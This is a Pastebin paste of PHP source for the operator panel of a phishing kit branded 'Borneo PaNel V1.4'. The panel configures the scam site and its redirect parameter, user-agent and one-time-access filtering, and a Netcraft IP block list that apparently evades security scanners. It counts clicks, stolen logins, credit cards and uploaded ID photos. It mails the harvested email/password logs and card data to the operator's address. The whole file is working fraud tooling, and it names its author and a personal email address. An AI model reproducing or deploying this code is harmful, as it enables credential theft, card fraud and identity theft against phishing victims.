Advertisement
aridho

vic-panelbaru

May 7th, 2018
1,058
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 22.58 KB | None | 0 0
  1. <?php
  2.  
  3. include 'conf/config.php';
  4. @require_once "setting.php";
  5. session_start();
  6. if($_SESSION['user'] == ""){
  7. header('location:bs.php');
  8. }
  9. $off = $_GET['account'];
  10. if(isset($off)){
  11.     if($off == 'off'){
  12.         session_destroy();
  13.         unset($_SESSION['user']);
  14.         session_unset();
  15.         header('location:bs.php');
  16.     }
  17.     else{
  18.         echo '';
  19.     }
  20. }
  21.  
  22. ?>
  23.  
  24. <html>
  25.     <head>
  26.         <title>Panel</title>
  27.         <style type="text/css">
  28.             input[type=submit],input[type=reset] {
  29.                 width: 27%;
  30.                 border-radius: 5px;
  31.                 background: #f0f0f0;
  32.                 padding: 3px;
  33.             }
  34.         </style>
  35.     </head>
  36.     <body bgcolor="#f0f0f0">
  37.         <div id="bukak">
  38.             <a style="text-decoration:none; background-color: #0070c9; background: linear-gradient(#42a1ec, #0070c9); color: white; border-radius: 5px; padding: 3px 7px;" href="https://<?php echo $_SERVER['SERVER_NAME']."/".$param;?>" target="_blank">View Scam</a>
  39.             <a href="?account=off"><button class="peler">Log Out</button></a>
  40.                 <div class="form-group">
  41.                                 <label for="inputEmail" class="col-lg-2 control-label"></label>
  42.                                 <div class="col-lg-10">
  43.                                     TOKEN ACTIVE : <br><input class="form-control" readonly="true" name="lama" value="<?php echo $password; ?>" type="text">
  44. <link rel="SHORTCUT ICON" href="http://cdn.mysitemyway.com/etc-mysitemyway/icons/legacy-previews/icons/glowing-purple-neon-icons-alphanumeric/112654-glowing-purple-neon-icon-alphanumeric-letter-tt.png"/>
  45. <style type='text/css'>
  46.         body       {background-color:#1b1b1b; color:#CCCCCC; font-family: 'Courier New', Courier, monospace; font-size: 10pt; padding:5px;}
  47.         h2         {margin-bottom: 12px;}
  48.        
  49.         a, a:active {text-decoration: none; color:#009E99;}
  50.         a:visited   {color: #007070;}
  51.         a:hover, a:focus {text-decoration: none; color:#CCCCCC;}
  52.         a img       {border:none;}
  53.        
  54.         table      { }
  55.         th, td     { text-align:left; }
  56.         th         { font-weight: bold; padding-right: 14px; padding-bottom: 3px;}
  57.         td         {padding-right: 14px;}
  58.         td.s, th.s {text-align: right;}
  59.         </style>
  60.     </head>
  61.    
  62. <body>
  63.     <style>
  64.       }
  65.             .klik,.alat {
  66.                 text-align: center;
  67.                 padding: 5px 11px;
  68.                 background: black;
  69.                 font-weight: bold;
  70.                 font-family: sans-serif;
  71.                 letter-spacing: 1px;
  72.                 word-spacing: 1px;
  73.                 font-size: 13px;
  74.                 color:#00FF00;
  75.                 margin: 0px 5px 10px;
  76.                 display: inline;
  77.                 border-radius: 5px;
  78.             }
  79.       h1 {
  80.     color: #19abff;
  81.     font-size: 40px;
  82.     margin: 1px auto;
  83.     text-align:center;
  84.     text-transform:uppercase;
  85.         }
  86.     .neon {
  87.     color: #FFFFFF;
  88.     text-shadow: 0 0 5px #19abff, 0 0 10px #19abff, 0 0 20px #19abff, 0 0 45px #19abff, 0 0 40px #19abff;
  89.     }
  90.     </style>
  91.     <script language="JavaScript1.2">
  92. function ClearError() {return true;}
  93. window.onerror = ClearError;
  94. </script>
  95. <script>
  96. window.onload = function() {
  97. var h1 = document.getElementsByTagName("h1")[0],
  98. text = h1.innerText || h1.textContent,
  99. split = [], i, lit = 0, timer = null;
  100. for(i = 0; i < text.length; ++i) {
  101. split.push("<span>" + text[i] + "</span>");
  102. }
  103. h1.innerHTML = split.join("");
  104. split = h1.childNodes;
  105.  
  106. var flicker = function() {
  107. lit += 0.01;
  108. if(lit >= 1) {
  109. clearInterval(timer);
  110. }
  111. for(i = 0; i < split.length; ++i) {
  112. if(Math.random() < lit) {
  113. split[i].className = "neon";
  114. } else {
  115. split[i].className = "";
  116. }
  117. }
  118. }
  119. setInterval(flicker, 100);
  120. }
  121. </script>
  122. <br><br>
  123. <h1>Borneo Online </h1>
  124. <br>
  125. <center>
  126. If you need any help contact <a href="mailto:aridhoahmed3@gmail.com" >email@borneo.club</a> or contact fb #help
  127. </pre>
  128.     <center>
  129.         <br>
  130.     <a class="navbar-brand" href="#">Borneo PaNel V1.4</a>
  131.     <pre>
  132.  <script language="JavaScript1.2">
  133. var message="N e w . U p d a t e  . B o r n e o. V e r s i o n "
  134. var neonbasecolor="#F44336"
  135. var neontextcolor="white"
  136. var neontextcolor2="lime"
  137. var neontexsize="8"
  138. var flashspeed=50
  139. var flashingletters=2
  140. var flashingletters2=15
  141. var flashpause=0  
  142. ///No need to edit below this line/////
  143. var n=0
  144. if (document.all||document.getElementById){
  145. document.write('<b>')
  146. document.write('<font color="'+neonbasecolor+neontexsize+'">')
  147. for (m=0;m<message.length;m++)
  148. document.write('<span id="neonlight'+m+'">'+message.charAt(m)+'</span>')
  149. document.write('</font>')
  150. document.write('</b>')
  151. }
  152. else
  153. document.write(message)
  154. function crossref(number){
  155. var crossobj=document.all? eval("document.all.neonlight"+number) : document.getElementById("neonlight"+number)
  156. return crossobj
  157. }
  158. function neon(){
  159. //Change all letters to base color
  160. if (n==0){
  161. for (m=0;m<message.length;m++)
  162. crossref(m).style.color=neonbasecolor
  163. }
  164. //cycle through and change individual letters to neon color
  165. crossref(n).style.color=neontextcolor
  166. if (n>flashingletters-1) crossref(n-flashingletters).style.color=neontextcolor2
  167. if (n>(flashingletters+flashingletters2)-1) crossref(n-flashingletters-flashingletters2).style.color=neonbasecolor
  168. if (n<message.length-1)
  169. n++
  170. else{
  171. n=0
  172. clearInterval(flashing)
  173. setTimeout("beginneon()",flashpause)
  174. return
  175. }
  176. }
  177. function beginneon(){
  178. if (document.all||document.getElementById)
  179. flashing=setInterval("neon()",flashspeed)
  180. }
  181. beginneon()
  182. </script>
  183. </center><html>
  184.     <style>
  185.  
  186. h1 {font-size:2em;}
  187. .peler1{background:black; color:blue; border:1px solid blue; border-radius:6px;  margin:4px; padding:8px;}
  188. .peler1:hover{background:blue; color:black;}
  189. .peler{background:black; color:red; border:1px solid red; border-radius:2px;  margin:2px; padding:6px;}
  190. .peler:hover{background:red; color:black;}
  191. .but{background:black; color:#00FF00; border:1px solid green; border-radius:6px;  margin:4px; padding:8px;}
  192. .but:hover{background:#00FF00; color:black;}
  193. .clc{
  194.     background:black;
  195.         border:none;
  196.     border-radius:5px;
  197.     color:#00FF00;
  198.     font-weight:bold;
  199.     padding:5px;
  200.  
  201.     margin:7px;
  202. }
  203.  
  204. </style>
  205. </head>
  206.  
  207.  
  208.     <div>
  209.    
  210.  
  211.        
  212.                
  213.                 </div>
  214.                 <br>
  215.  
  216.         <form class="navbar-form navbar-right" role="search" action="#" method="post">
  217.                             <div class="form-group">
  218.                     <form method="POST">
  219.                                 <label for="inputEmail" class="col-lg-2 control-label"> </label>
  220.                                 <div class="col-lg-10">
  221.                                   Email Lama :  <input class="form-control"  name="baru" value="" placeholder="email@example.com" type="text">
  222.                                 </div>
  223.                             </div>
  224.                             <br>
  225.                          <div class="form-group">
  226.                                 <label for="inputEmail" class="col-lg-2 control-label"></label>
  227.                                 <div class="col-lg-10">
  228.                                     Email Baru : <input class="form-control" readonly="true" name="lama" value="<?php echo $Your_Email; ?>" type="text">
  229.                                 </div>
  230.                             </div>
  231.                             <br>
  232.                             <input type="submit" class="btn btn-primary" name="email" value="Ganti Email Result"></input>
  233.                      
  234.                
  235.             <br>
  236.              
  237.                     </li>
  238.                 </ul>
  239.             </div>
  240.         </div>
  241.     </nav>
  242.     <div class="container">
  243.         <div class="row">
  244.             <div class="col-lg-6">
  245.                 <div class="well">
  246.                         <fieldset>
  247.                             <center>
  248.                              <center><font color ="blue">* Mode *  </font></center><br>
  249.                             <center><font color ="yellow">* Wajib Tanya Jika Belum Paham " !!</font></center><br>
  250. <form  method="POST" class="form-horizontal">
  251.                                  <div class="form-group">
  252.                                 <label for="inputEmail" class="col-lg-2 control-label">True Login</label>
  253.                                 <div class="col-lg-10">
  254.                        <input class="col-lg-5 control-label" type="text"  readonly="true" name="tll" value="<?php echo $t_login; ?>"></input>
  255.                         <input class="col-lg-5 control-label" type="text" name="tlb" placeholder="True Login"></input>
  256.                             <input type="submit" class="btn btn-primary control-label" name="tls" value="Save"></input>
  257.                           </div>
  258.                             </div>
  259.                          
  260.  
  261. </form>
  262.                         <form  method="POST" class="form-horizontal">
  263.                                  <div class="form-group">
  264.                                 <label for="inputEmail" class="col-lg-2 control-label">Panel</label>
  265.                                 <div class="col-lg-10">
  266.                        <input class="col-lg-5 control-label" type="text"  readonly="true" name="keylama" value="<?php echo $panel; ?>"></input>
  267.                         <input class="col-lg-5 control-label" type="text" name="keybaru" placeholder="Profile Script"></input>
  268.                             <input type="submit" class="btn btn-primary control-label" name="key" value="Save"></input>
  269.                           </div>
  270.                             </div>
  271.                          
  272.  
  273. </form>
  274. <form  method="POST" class="form-horizontal">
  275.                                  <div class="form-group">
  276.                                 <label for="inputEmail" class="col-lg-2 control-label">Site Scam</label>
  277.                                 <div class="col-lg-10">
  278.                        <input class="col-lg-5 control-label" type="text"  readonly="true" name="parla" value="<?php echo $param; ?>"></input>
  279.                         <input class="col-lg-5 control-label" type="text" name="parba" placeholder="ParameterSite"></input>
  280.                             <input type="submit" class="btn btn-primary control-label" name="param" value="Save"></input>
  281.                           </div>
  282.                             </div>
  283.                          
  284.  
  285. </form>
  286. <form  method="POST" class="form-horizontal">
  287.                                  <div class="form-group">
  288.                                 <label for="inputEmail" class="col-lg-2 control-label">User Agent</label>
  289.                                 <div class="col-lg-10">
  290.                        <input class="col-lg-5 control-label" type="text"  readonly="true" name="ual" value="<?php echo $user_allow; ?>"></input>
  291.                         <input class="col-lg-5 control-label" type="text" name="uab" placeholder="true / false"></input>
  292.                             <input type="submit" class="btn btn-primary control-label" name="usas" value="Save"></input>
  293.                           </div>
  294.                             </div>
  295.                          
  296.  
  297. </form>
  298.  
  299. <form  method="POST" class="form-horizontal">
  300.                                  <div class="form-group">
  301.                                 <label for="inputEmail" class="col-lg-2 control-label">One Time Access</label>
  302.                                 <div class="col-lg-10">
  303.                        <input class="col-lg-5 control-label" type="text"  readonly="true" name="otal" value="<?php echo $One_Time_Access; ?>"></input>
  304.                         <input class="col-lg-5 control-label" type="text" name="otab" placeholder="block / non"></input>
  305.                             <input type="submit" class="btn btn-primary control-label" name="otas" value="Save"></input>
  306.                           <br>
  307.                 <center><br>
  308. <form method="POST">
  309.                     <div class="klik">Click : <font color="blue"><?php echo empty(@file_get_contents("assets/logs/._click_.txt")) ? "0" : @file_get_contents("assets/logs/._click_.txt"); ?></font></div>
  310.                    
  311.                     <div class="klik">Login : <font color="orange"><?php echo empty(@file_get_contents("assets/logs/._login_.txt")) ? "0" : @file_get_contents("assets/logs/._login_.txt"); ?></font></div>
  312.                    
  313.                     <div class="klik">Credit Card : <font color="yellow"><?php echo empty(@file_get_contents("creditcard.txt")) ? "0" : @file_get_contents("creditcard.txt"); ?></font></div>
  314.                    
  315.                     <div class="klik">Upluad ID : <font color="red"><?php echo empty(@file_get_contents("poto.txt")) ? "0" : @file_get_contents("poto.txt"); ?></font></div>
  316.                     </form>
  317.             </div>
  318.         </div>
  319.  
  320.                
  321.                      
  322.             </div>
  323.            
  324.             </div>
  325.             <?php
  326.    @unlink("set.php");
  327.    
  328.     $lama   = trim(@$_POST['lama']);
  329.     $baru   = trim(@$_POST['baru']);
  330.     $keylama = trim(@$_POST['keylama']);
  331.     $keybaru = trim(@$_POST['keybaru']);
  332.     $parla = trim(@$_POST['parla']);
  333.     $parba = trim(@$_POST['parba']);
  334.     $ual = trim(@$_POST['ual']);
  335.     $uab = trim(@$_POST['uab']);
  336.     $tll = trim(@$_POST['tll']);
  337.     $tlb = trim(@$_POST['tlb']);
  338.     $otal = trim(@$_POST['otal']);
  339.     $otab = trim(@$_POST['otab']);
  340.     $file   = "setting.php";
  341.     $isi    = @file_get_contents($file);
  342.  
  343. if(isset($_POST['email'])) {
  344.     if(@preg_match("#\b$lama\b#is", $isi)) {
  345.         $isi = str_replace($lama,$baru,$isi);
  346.         $buka = @fopen($file,'w');
  347.         @fwrite($buka,$isi);
  348.         fclose($buka);
  349.        
  350.         echo "<script>alert('Success')</script>";
  351.         echo "<meta http-equiv='refresh' content='0; url=#ganti_email'/>";
  352.     }
  353.     else
  354.          echo "<script>alert('Failed')</script>";
  355. }
  356. else if(isset($_POST['key'])) {
  357.    if(@preg_match("#\b$keylama\b#is", $isi)) {
  358.         $isi = str_replace($keylama,$keybaru,$isi);
  359.         $buka = @fopen($file,'w');
  360.         @fwrite($buka,$isi);
  361.         fclose($buka);
  362.        
  363.         echo "<script>alert('Success')</script>";
  364.        
  365.     }
  366.     else
  367.          echo "<script>alert('Failed')</script>";
  368. }else if(isset($_POST['usas'])) {
  369.    if(@preg_match("#$ual#is", $isi)) {
  370.         $isi = str_replace($ual,$uab,$isi);
  371.         $buka = @fopen($file,'w');
  372.         @fwrite($buka,$isi);
  373.         fclose($buka);
  374.         echo "<script>alert('Success')</script>";
  375.         echo "<meta http-equiv='refresh' content='0; url=#change_userallow'/>";
  376.           echo "<meta http-equiv='refresh' content='0; url=#change_userallow'/>";
  377.     }
  378.     else
  379.          echo "<script>alert('Failed')</script>";
  380. }else if(isset($_POST['param'])) {
  381.     if(@preg_match("#param = \"$parla\"#is", $isi)) {
  382.         $isi = str_replace("$parla\"; // Parameter Redirect","$parba\"; // Parameter Redirect",$isi);
  383.         $buka = @fopen($file,'w');
  384.         @fwrite($buka,$isi);
  385.         fclose($buka);
  386.        
  387.         @rename($parla.".php",$parba.".php");
  388.        
  389.         echo "<script>alert('Success')</script>";
  390.         echo "<meta http-equiv='refresh' content='0; url=#ganti_parameter'/>";
  391.         echo "<meta http-equiv='refresh' content='0; url=#ganti_parameter'/>";
  392.     }    
  393.     else
  394.          echo "<script>alert('Failed')</script>";
  395. }else if(isset($_POST['tls'])) {
  396.    if(@preg_match("#$tll#is", $isi)) {
  397.         $isi = str_replace($tll,$tlb,$isi);
  398.         $buka = @fopen($file,'w');
  399.         @fwrite($buka,$isi);
  400.         fclose($buka);
  401.         echo "<script>alert('Success')</script>";
  402.         echo "<meta http-equiv='refresh' content='0; url=#change_truelogin'/>";
  403.           echo "<meta http-equiv='refresh' content='0; url=#change_truelogin'/>";
  404.     }
  405.     else
  406.          echo "<script>alert('Failed')</script>";
  407. }else if(isset($_POST['otas'])) {
  408.    if(@preg_match("#$otal#is", $isi)) {
  409.         $isi = str_replace($otal,$otab,$isi);
  410.         $buka = @fopen($file,'w');
  411.         @fwrite($buka,$isi);
  412.         fclose($buka);
  413.         echo "<script>alert('Success')</script>";
  414.         echo "<meta http-equiv='refresh' content='0; url=#change_OneTimeAccess'/>";
  415.           echo "<meta http-equiv='refresh' content='0; url=#change_OneTimeAccess'/>";
  416.     }
  417.     else
  418.          echo "<script>alert('Failed')</script>";
  419. }
  420. else if(isset($_POST['rd'])) {
  421.        @unlink("._no_.txt");
  422.        @unlink("._nob_.txt");
  423.        @unlink("assets/logs/._click_.txt");
  424.        @unlink("assets/logs/._loginz_.txt");
  425.        @unlink("assets/logs/._ccz_.txt");
  426.        @unlink("._logz_.txt");
  427.        @unlink("assets/logs/bxp.log");
  428.        @unlink("assets/logs/bin.log");
  429.        @unlink("error_log");
  430.        @unlink("._ssid.txt");
  431.        // @unlink("assets/includes/blacklist.dat");
  432.        @unlink("assets/logs/accepted_visitors.txt");
  433.        @unlink("assets/logs/ip2_log.txt");
  434.        @unlink("assets/logs/denied_visitors.txt");
  435.        @unlink("assets/logs/visitor_logged_in.txt");
  436.        
  437.        $filee = @file_get_contents("assets/includes/blacklist.dat");
  438.        $cek = preg_match_all("/# NETCRAFT IP RANGES(.*)# USERS COMPLETED/is", $filee, $res) ? $res : null;
  439.        $buka = @fopen("assets/includes/blacklist.dat",'w');
  440.        @fwrite($buka,$cek[0][0]."\r\r");
  441.        @fclose($buka);
  442.        
  443.        echo "<script>alert('Success')</script>";
  444.        echo "<meta http-equiv='refresh' content='0; url=#reset_data'/>";
  445. }
  446. else if(isset($_POST['sd'])) {
  447.     $empass          = @file_get_contents("assets/logs/bxp.log");
  448.     $total          = substr_count($empass,"@");
  449.    
  450.     if($total <= 0)
  451.         {
  452.             echo '<script>alert("Failed\n\Email And Password Not Found.")</script>';
  453.         }
  454.     else
  455.         {
  456.             $fil = "._no_.txt";
  457.             $last = (@file_get_contents($fil) == "" ? "1" : @file_get_contents($fil));
  458.             $urut = fopen($fil,"w");
  459.             fwrite($urut,$last+1);
  460.             fclose($urut);
  461.            
  462.             $headers          = "From: Empas Apel <empas@BOrneo-php.team>\r\n";
  463.             $headers         .= "Reply-to: BOrneo@php.team\r\n";
  464.             $headers         .= "MIME-Version: 1.0\r\n";
  465.             $headers         .= "Content-Type: text/plain; charset=UTF-8\r\n";
  466.             $subj            = "[ Empas #$last ] [ Total $total Lines ] [ ".date("D, d-F-y H:i")." ]";
  467.             $to              = $Your_Email;
  468.             $data            = "-===================== BORNEO SCRPT PHP =====================-
  469.  
  470.  -----------------------------------------------------------------
  471. $empass
  472.  -----------------------------------------------------------------";
  473.            
  474.             @mail($to, $subj, $data, $headers);
  475.            
  476.             echo "<script>alert('Success')</script>";
  477.             echo "<meta http-equiv='refresh' content='0; url=#send_empas'/>";
  478.         }
  479. }
  480. else if(isset($_POST['sb'])) {
  481.     $binbin          = @file_get_contents("asset/logs/bin.log");
  482.     $total          = substr_count($binbin,"[");
  483.    
  484.     if($total <= 0)
  485.         {
  486.             echo '<script>alert("Failed~\n\nBIN Not Found.")</script>';
  487.         }
  488.     else
  489.         {
  490.             $fil = "._nob_.txt";
  491.             $last = (@file_get_contents($fil) == "" ? "1" : @file_get_contents($fil));
  492.             $urut = fopen($fil,"w");
  493.             fwrite($urut,$last+1);
  494.             fclose($urut);
  495.            
  496.             $headers          = "From: Bin Colletions <bin@BOrneo-php.TEAM>\r\n";
  497.             $headers         .= "Reply-to: BOrneo@php.team\r\n";
  498.             $headers         .= "MIME-Version: 1.0\r\n";
  499.             $headers         .= "Content-Type: text/plain; charset=UTF-8\r\n";
  500.             $subj            = "[ Bin #$last ] [ Total $total Cards ] [ ".date("D, d-F-y H:i")." ]";
  501.             $to              = $Your_Email;
  502.             $data            = "-===================== BORNEO SCRPT PHP =====================-
  503.  
  504.  -----------------------------------------------------------------
  505. $binbin
  506.  -----------------------------------------------------------------";
  507.            
  508.             @mail($to, $subj, $data, $headers);
  509.            
  510.             echo "<script>alert('Success')</script>";
  511.             echo "<meta http-equiv='refresh' content='0; url=#send_bin'/>";
  512.         }
  513. }
  514. else if(isset($_POST['sl'])) {
  515.             $fil2 = "._logz_.txt";
  516.             $lasts = (@file_get_contents($fil2) == "" ? "1" : @file_get_contents($fil2));
  517.             $urut = fopen($fil2,"w");
  518.             fwrite($urut,$lasts+1);
  519.             fclose($urut);
  520.            
  521.             $headers          = "From: BORNEO SCRPT PHP Report <report@BOrneo-php.TEAM>\r\n";
  522.             $headers         .= "Reply-to: BOrneo@php.team\r\n";
  523.             $headers         .= "MIME-Version: 1.0\r\n";
  524.             $headers         .= "Content-Type: text/plain; charset=UTF-8\r\n";
  525.             $subj            = "[ Report #$lasts ] [ BOrneo-RSJ KING TEAM ] [ ".date("D, d-F-y H:i")." ]";
  526.             $to              = $Your_Email;
  527.             $tor = $tglorder;
  528.             $tcl = (@file_get_contents("assets/logs/._click_.txt") == "" ? "0" : @file_get_contents("assets/logs/._click_.txt"));
  529.             $tlo = (@file_get_contents("assets/logs/._loginz_.txt") == "" ? "0" : @file_get_contents("assets/logs/._loginz_.txt"));
  530.             $tcc = (@file_get_contents("assets/logs/._ccz_.txt") == "" ? "0" : @file_get_contents("assets/logs/._ccz_.txt"));
  531.             $tlh = substr_count(@file_get_contents("._ssid.txt")," ");
  532.             $det = array("u" => $_SERVER['SERVER_NAME'],"p" => $_SERVER['SERVER_NAME'].$_SERVER["REQUEST_URI"],"m" => $umurlog,"tc" => $tcl,"tl" => $tlo,"tcc" => $tcc,"lh" => $tlh);
  533.             $data            = "
  534. -===================== BORNEO SCRPT PHP =====================-
  535. # Domen Scam     :   ".$det['u']."
  536. # Panel Scam       :   ".$det['p']."
  537. # Umur Scam        :   ".$det['m']." hari
  538. # Tanggal Order    :   ".$tor."
  539. # Total Load          :   ".$det['lh']."
  540. # Total Klik            :   ".$det['tc']."
  541. # Total Login         :   ".$det['tl']."
  542. # Total Card          :   ".$det['tcc']."
  543. -===================== BORNEO SCRPT PHP =====================-";
  544.            
  545.             @mail($to, $subj, $data, $headers);
  546.            
  547.             echo "<script>alert('Success')</script>";
  548.             echo "<meta http-equiv='refresh' content='0; url=#send_report'/>";
  549. }
  550. ?>
  551.  <div class="row tall-row">
  552.             <div class="col-md-12">
  553.                 <p>Created by <a https://www.facebook.com/ridho.sket">ARI RIDHO</a>  &copy; 2018</p>
  554.             </div>
  555.         </div>
  556.          <script src="https://ajax.googleapis.com/ajax/libs/jquery/1.11.2/jquery.min.js"></script>
  557.     <script src="//maxcdn.bootstrapcdn.com/bootstrap/3.3.4/js/bootstrap.min.js"></script>
  558.  
  559.         </body>
  560.         </html>    
  561.        
  562.  
  563.  
  564.  
  565.        
  566.     </body>
  567. </html>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement